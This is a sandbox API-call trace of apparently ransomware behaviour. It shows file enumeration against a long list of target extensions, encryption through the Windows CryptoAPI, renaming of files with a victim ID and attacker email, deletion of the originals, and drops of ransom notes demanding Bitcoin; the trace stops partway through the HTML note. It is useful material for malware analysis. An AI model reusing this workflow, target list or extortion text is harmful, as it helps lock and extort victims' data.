	[0173.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0173.022] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0173.022] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0173.022] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19b3e1c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19b3e1c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0173.022] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0173.022] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0173.022] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\"
	[0173.023] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml"
	[0173.023] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml") returned 97
	[0173.023] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.023] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml") returned 0x61
	[0173.023] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.023] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.023] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"
	[0173.023] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml") returned 97
	[0173.024] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.024] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.024] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.024] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.025] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.026] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.026] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.027] ReadFile (in: hFile=0x39c, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x22b, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x189930*=0x22b, lpOverlapped=0x0) returned 1
	[0173.030] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.030] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcae68) returned 1
	[0173.032] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.033] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0173.033] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.033] CryptHashData (hHash=0xfb9530, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.033] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.033] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9530, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb90f0) returned 1
	[0173.033] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.033] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x22b, dwBufLen=0x22b | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x230) returned 1
	[0173.034] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.034] RtlMoveMemory (in: Destination=0xfdc7d8, Source=0xfdc138, Length=0x22b | out: Destination=0xfdc7d8) 
	[0173.034] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.034] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc7d8*, pdwDataLen=0x1894dc*=0x22b, dwBufLen=0x230 | out: pbData=0xfdc7d8*, pdwDataLen=0x1894dc*=0x230) returned 1
	[0173.035] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.035] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0173.035] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.035] CryptDestroyHash (hHash=0xfb9530) returned 1
	[0173.035] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.035] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0173.036] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.036] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.036] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.037] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0173.038] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0173.038] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0173.038] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc7d8*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc7d8*, lpNumberOfBytesWritten=0x189938*=0x230, lpOverlapped=0x0) returned 1
	[0173.042] CloseHandle (hObject=0x3a0) returned 1
	[0173.043] CloseHandle (hObject=0x39c) returned 1
	[0173.043] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml")) returned 1
	[0173.047] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml")) returned 0
	[0173.047] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19b3e1c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19b3e1c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0173.047] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0173.047] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0173.048] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov"
	[0173.048] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*"
	[0173.048] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.048] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.048] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0173.049] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.049] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.049] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.052] CloseHandle (hObject=0x390) returned 1
	[0173.053] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.053] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0173.055] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.055] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.055] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.055] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.055] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0173.056] CloseHandle (hObject=0x390) returned 1
	[0173.056] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.056] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.057] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.058] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0173.058] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.063] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! 